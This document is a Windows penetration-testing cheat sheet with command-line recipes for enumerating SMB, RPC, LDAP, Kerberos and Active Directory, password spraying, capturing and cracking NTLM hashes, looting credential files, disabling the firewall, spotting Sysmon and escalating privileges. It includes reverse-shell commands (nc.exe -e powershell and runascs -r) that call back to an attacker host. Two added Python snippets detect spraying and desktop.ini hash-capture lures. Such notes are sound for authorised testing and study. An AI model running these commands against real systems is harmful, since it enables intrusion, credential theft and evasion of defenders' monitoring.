Windows pentesting notes

1. Kali Linux

/usr/share/windows-resources                # Tools for Windows
/usr/share/peass/winpeas                    # WinPeas binary

2. Important directories

%SystemDrive%\inetpub\                      # IIS data and sites
C:\Windows\System32\drivers\etc\services    # List of services and ports

3. MSRPC

MSRPC can be used to enumerate internal OS information.

enum4linux -a <ip> -u <user> -p <pass>      # Enumerate all info

3.1. Manual enumeration (rpcclient)

rpcclient -U "" <ip>                        # Login anonymously
rpcclient -U "<DOMAIN>\\<user>" <ip>        # Login with credentials
> ?                                         # List all commands
> srvinfo                                   # Server info
> enumdomusers                              # Enum users
> enumdomgroups                             # Enum groups
> enumdomains                               # Enum domains
> netshareenumall                           # Enum SMB shares
> queryuser <user-name>                     # Detailed user info
> lookupnames <user-name>                   # Get SID of user
> querygroup <group-rid>                    # Get group info
> enumprivs                                 # Enum current user's privileges
> getusername                               # Get current username

4. MSSQL

impacket-mssqlclient "<domain>/<user>:<pass>@<ip>"

4.1. Syntax

select @@version                                -- Get SQL Server version (includes OS build)
select user_name()                              -- Get current database user name
select name,crdate from master.dbo.sysdatabases -- List all databases
use <db>                                        -- Use database (context)

-- List all tables of current DB
select TABLE_NAME from INFORMATION_SCHEMA.TABLES

5. SMB (139, 445)

SMB can be used to enumerate OS info (domain, NetBIOS, forest).

5.1. Enumeration

nmap -p 445 --script=smb-os-discovery <ip>
nbtscan <ip>
nmblookup -A <ip>

# Anonymous shares enumeration
smbclient -L //<ip>/
smbmap -H <ip>
 
# Shares enumeration using credentials
crackmapexec smb <ip> -u <user> -p <pass> --shares
smbclient -L //<ip>/ -U "<domain>/<username>%<password>"
smbmap -H <ip> -u <username> -p <password> -d <domain>
 
# Mount SMB share
sudo mount -t cifs -o "user=<username>,password=<password>" //<ip>/<share> /mnt/<dir>

5.2. Password spraying

crackmapexec smb <ip> -u <user-file> -p <pass-file> --continue-on-success
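Added detection example (not part of the original notes): a spray like the one above shows up in the Security log as one source failing logons (event 4625) against many different accounts in a short window, which is the opposite shape of a brute force against a single account. The records below are constructed; the field layout is an assumption.

```python
# Added example: flag password spraying from constructed Windows Security log
# records shaped as (timestamp, event_id, source_ip, target_user).
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: one spraying source, one single-account brute force.
SAMPLE_EVENTS = [
    ("2024-05-01T10:00:01", 4625, "10.0.0.5", "alice"),
    ("2024-05-01T10:00:02", 4625, "10.0.0.5", "bob"),
    ("2024-05-01T10:00:02", 4625, "10.0.0.5", "carol"),
    ("2024-05-01T10:00:03", 4625, "10.0.0.5", "dave"),
    ("2024-05-01T10:00:04", 4624, "10.0.0.5", "erin"),   # a success from the same source
    ("2024-05-01T10:00:10", 4625, "10.0.0.9", "alice"),  # same user repeated: not a spray
    ("2024-05-01T10:00:11", 4625, "10.0.0.9", "alice"),
    ("2024-05-01T10:00:12", 4625, "10.0.0.9", "alice"),
    ("2024-05-01T11:30:00", 4625, "10.0.0.5", "frank"),  # outside the window
]

def detect_spray(events, min_users=3, window=timedelta(minutes=5)):
    """Return {source_ip: {...}} for sources whose 4625 failures hit at least
    `min_users` distinct accounts inside a sliding `window`. Any 4624 success
    from a flagged source is listed too, since a spray usually ends with one."""
    failures = defaultdict(list)   # source -> [(time, user)]
    successes = defaultdict(set)   # source -> {user}
    for ts, event_id, src, user in events:
        t = datetime.fromisoformat(ts)
        if event_id == 4625:
            failures[src].append((t, user))
        elif event_id == 4624:
            successes[src].add(user)

    findings = {}
    for src, fails in failures.items():
        fails.sort()
        sprayed = set()
        lo = 0
        for hi in range(len(fails)):
            # Shrink the window from the left until it spans at most `window`.
            while fails[hi][0] - fails[lo][0] > window:
                lo += 1
            users = {u for _, u in fails[lo:hi + 1]}
            if len(users) >= min_users:
                sprayed |= users
        if sprayed:
            findings[src] = {"users": sorted(sprayed),
                             "successes_from_source": sorted(successes[src])}
    return findings
```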

5.3. Connection / shell

# Connect to share by credentials
smbclient //<ip>/<share> [-U "<DOMAIN>\\<user>%<pass>"]
> get <file>                                # Get file
> put <local-file>                          # Upload file
> exit                                      # Exit
 
# Connect and execute command at once
smbclient [...] -c "<smb-command>"
 
# GUI connection (and standard terminal further)
xdg-open smb://<ip>/<share>
 
# Try to get shell via SMB
impacket-smbexec <domain>/<user>[:password]@<ip>

Known exploit: EternalBlue MS17-010

6. Kerberos

# Kerberos can be used to enumerate valid usernames and brute-force passwords
kerbrute userenum -d <domain> --dc <dc-ip> <wordlist-file>

# Grab an AS-REP hash for an account with Kerberos pre-authentication disabled
impacket-GetNPUsers <domain>/<username> -no-pass

7. WinRM

evil-winrm -i <ip> -u <username> -H <hash>  # Login by hash
evil-winrm -i <ip> -u <username> -p <pass>  # Login by password

8. NTLM

responder -I <iface> -dw                    # Sniff NTLM auth attempt
hashcat -m 5500 <hash-file> <wordlist>      # Crack NTLMv1 hash
hashcat -m 5600 <hash-file> <wordlist>      # Crack NTLMv2 hash

8.1. NTLM hash capture

Places and tricks to capture Net-NTLM hashes. The trick is to force the victim host to attempt authentication against the attacker's host (captured with responder above). Places to check:

  • desktop.ini - can contain a //<my-ip>/ or \\<my-ip>\ line; often present on SMB shares.
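Added defensive example (not from the original notes): audit desktop.ini files found on a share for icon paths that point at a foreign host, which is exactly the lure described above. The sample files are constructed and the trusted-host allowlist is an assumption.

```python
# Added example: find desktop.ini icon paths that reference an untrusted UNC host.
# Explorer resolves IconResource/IconFile when it renders a folder, so such a
# line makes every visitor authenticate to that host.
import re

# Keys in [.ShellClassInfo] that Explorer treats as file paths.
PATH_KEYS = {"iconresource", "iconfile"}
# Matches both \\host\... and //host/... forms; the host may be an IP or a name.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")

def suspicious_desktop_ini(content, trusted_hosts):
    """Return (key, host) pairs for ShellClassInfo path keys pointing to a UNC
    host outside `trusted_hosts`. Local drive paths are ignored."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    in_section = False
    for raw in content.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[.shellclassinfo]"
            continue
        if not in_section or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() not in PATH_KEYS:
            continue
        m = UNC_RE.match(value)
        if m and m.group(1).lower() not in trusted:
            hits.append((key, m.group(1)))
    return hits

# Constructed samples: a benign file and a planted lure (192.0.2.77 is a doc-range IP).
BENIGN_INI = "[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n"
LURE_INI = "[.ShellClassInfo]\nIconResource=\\\\192.0.2.77\\share\\icon.ico\n"
```

Run the function over every desktop.ini pulled from a share listing and alert on any non-empty result; hidden desktop.ini files are easy to miss in a manual review.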

9. LDAP

responder -I <iface> -dw                    # Sniff LDAP auth attempt

10. WMI

# Try to get shell via WMI
impacket-wmiexec <domain>/<user>[:password]@<ip>

11. IIS

TBD

12. FTP

TBD

13. PXE boot image

PowerShell script for extracting interesting data from a PXE boot image.

14. Interesting files to loot

C:\Windows\System32\drivers\etc\hosts       # /etc/hosts
C:\inetpub\logs\LogFiles\W3SVC1\            # IIS logs
C:\inetpub\wwwroot\web.config               # IIS config
C:\xampp\apache\logs\                       # XAMPP logs
C:\xampp\passwords.txt                      # XAMPP credentials

15. Reconnaissance

15.1. NFS

showmount -e <ip>                           # List NFS shares
mount -t nfs <ip>:/<share> <dest-dir>       # Mount NFS share

15.2. NetBIOS

nmblookup -A <ip>
nbtscan <ip>/<mask-bits>
nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>

15.3. SNMP

public is the common default community string for the SNMP service.

snmp-check <ip> -c <pub-string>             # Nice-looking enumeration
snmpwalk -v <ver> -c <pub-string> <ip> -m + # Enumerate MIB data
[...] NET-SNMP-EXTEND-MIB::nsExtendObjects  # Detect SNMP extend (commands run by the agent)

15.4. LDAP

# Enumerate top-level AD objects anonymously
ldapsearch -H ldap://<ip>:389/ -x -s base -b '' "(objectClass=*)" "*" +
 
# Enumerate all AD sub-objects of DN string (domain)
ldapsearch -H ldap://<ip>:389/ -x -s sub -b '<base-DN>' "(objectClass=*)" "*" +   # base-DN e.g. 'DC=<domain>,DC=<tld>'
 
# Connect to LDAP using credentials
ldapsearch -x -H ldap://<ip>:<port> -D "<DOMAIN>\\<user>" -w <pass>

16. Post-exploitation

16.1. CMD and Powershell

  • ss64 - PowerShell and CMD commands cheat-sheet

nc.exe -e powershell <my-ip> <my-port>      # Connect shell to listener
 
# Download file (tip: check file integrity)
Invoke-WebRequest -URI <url> -OutFile <file>
 
Get-FileHash <file> -Algorithm MD5          # Calculate MD5 file hash
gci env:* | sort-object name                # List env variables
 
get-localuser                               # List all local users
Get-NetAdapter -Name * -IncludeHidden       # List all network adapters
ipconfig /all                               # Show network configuration
net share                                   # List local SMB shares
net view \\<machine> /all                   # List remote SMB shares
net start                                   # List services
net user                                    # List all local users
net user <username>                         # Get info about local user
net localgroup                              # List all local groups   
net localgroup <group>                      # Get info about local group
net accounts                                # List local password policy
netstat -avb -p <TCP|UDP>                   # List open ports
arp -a                                      # List ARP table (discover hosts)
tasklist                                    # List processes
systeminfo                                  # Get local system and AD info
get-service WinDefend                       # Get state of Windows Defender
Get-MpComputerStatus                        # Get status of AV software
Get-MpThreat                                # Get details of detected threat
Get-NetFirewallProfile                      # List profiles of local firewall
Get-NetFirewallRule                         # List rules of local firewall
reg query <registry-key>                    # Get Windows registry key value
Get-ExecutionPolicy                         # Check current execution policy
 
 
# Find TCP port by service PID
netstat -noa | findstr "LISTENING" | findstr <PID>
netstat
  -a                                        # Show all connections and listening ports
  -b                                        # Show assigned binary
  -n                                        # Do not resolve IP
  -o                                        # Show PID
 
# Get event logs
Get-EventLog -List        
Get-EventLog -LogName System -EntryType Error      
 
# Disable firewall profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
 
# Test for connections to other machines
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
(New-Object System.Net.Sockets.TcpClient("127.0.0.1", "80")).Connected
 
# Sysmon detection tricks
Get-Process | Where-Object { $_.ProcessName -eq "Sysmon" }
Get-CimInstance win32_service -Filter "Description = 'System Monitor service'"
Get-Service | where-object {$_.DisplayName -like "*sysm*"}
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational
findstr /si '<ProcessCreate onmatch="exclude">' C:\tools\*
 

16.2. Active Directory information gathering

CMD:

net user /domain                            # List all AD users
net user <username> /domain                 # Get info about AD user
net group /domain                           # List all AD groups
net group <group> /domain                   # Get info about AD group
net accounts /domain                        # Get AD password policy
systeminfo | findstr Domain                 # Get AD domain name

PowerShell:

# IMPORTANT: `import-module ActiveDirectory` might be required.
get-aduser -filter *                        # List all AD users
get-aduser <user>                           # User info
get-adgroup <group>                         # Group info
get-adforest                                # Current forest info
get-addomain -server <DC>                   # Get info about current AD domain
 
# Get full info about AD user
get-aduser -identity <username> -server <DC> -properties *
 
# Get AD users by Distinguished Name
get-aduser -filter * -searchbase <DN>
 
# Get full info about AD group
get-adgroup -identity <group> -server <DC> -properties *

17. Privilege escalation

17.1. Weakness discovering

Seatbelt - Windows host security enumeration tool (C#)

whoami /priv                                # List privileges of user
whoami /groups                              # List groups of user
winpeas.exe                                 # Enumerate potential findings

17.2. Run command as a different user

Some commands have no option to specify domain credentials. The workaround is to start a new local shell under the target domain account and run those commands from it.

Windows has a built-in runas.exe binary that runs any command as a different user. With /netonly the credentials are not validated against a DC when the process starts (they are only loaded into the new logon session); they are then used for every outbound domain authentication the process performs. The binary is sometimes missing on a real server.

runas.exe /netonly /user:<domain>\<username> "<command>"
 
# We have to check if the credentials work. Every AD account
# (even with the lowest privileges) has access to the SYSVOL folder.
dir \\<FQDN>\SYSVOL\                        # Using Kerberos auth
dir \\<IP>\SYSVOL\                          # Using NTLM auth

Other (non-built-in) tools:

  • JuicyPotatoNG - local privilege-escalation tool
  • RunasCs - tool to open a shell connection as a different user

.\runascs.exe -d <domain> <user> <pass> cmd.exe -r <my-ip>:<my-port>